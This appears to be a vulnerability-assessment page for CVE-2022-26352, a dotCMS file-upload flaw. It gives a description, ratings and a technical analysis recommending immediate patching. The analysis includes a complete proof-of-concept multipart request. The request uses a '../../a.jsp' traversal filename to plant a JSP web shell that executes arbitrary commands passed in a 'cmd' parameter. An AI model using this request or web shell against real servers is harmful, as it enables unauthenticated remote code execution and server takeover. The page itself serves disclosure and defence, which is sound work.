Attacker Value
High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
2

CVE-2022-26352

Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

An issue was discovered in the ContentResource API in dotCMS 3.0 through 22.02. Attackers can craft a multipart form request to post a file whose filename is not initially sanitized. This allows directory traversal, in which the file is saved outside of the intended storage location. If anonymous content creation is enabled, this allows an unauthenticated attacker to upload an executable file, such as a .jsp file, that can lead to remote code execution.

Add Assessment

2
Ratings
  • Attacker Value
    High
  • Exploitability
    Very High
Technical Analysis

The API used by DotCMS is vulnerable to an arbitrary file upload vulnerability which can lead to RCE. The /api/content/ endpoint allows for files to be uploaded to the tomcat server. The filename in versions prior to 22.03, 5.3.8.10, 21.06.7 is not sanitized and allows the attacker to drop a malicious .jsp file in the webroot of the tomcat server, which is accessible remotely.

PoC taken from the write up mentioned below:

POST /api/content/ HTTP/1.1
Host: 172.16.199.227:8443
User-Agent: curl/7.64.1
Accept: */*
Content-Length: 1085
Content-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3
Connection: close

--------------------------aadc326f7ae3eac3
Content-Disposition: form-data; name="name"; filename="../../a.jsp"
Content-Type: text/plain

<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p;
    if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){
        p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));
    }
    else{
        p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    }
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
    out.println(disr);
    disr = dis.readLine();
    }
}
%>
</pre>
</BODY></HTML>
--------------------------aadc326f7ae3eac3--

The filename has been changed to work on windows and on linux irrespective of the relative install path of DotCMS.

This vulnerability is trivial to exploit and patching immediately is recommended.

The security research to find this vulnerability was performed by Hussein Daher and Shubham Shah and they have written a very nice detailed write up for more information.

General Information

Additional Info

Technical Analysis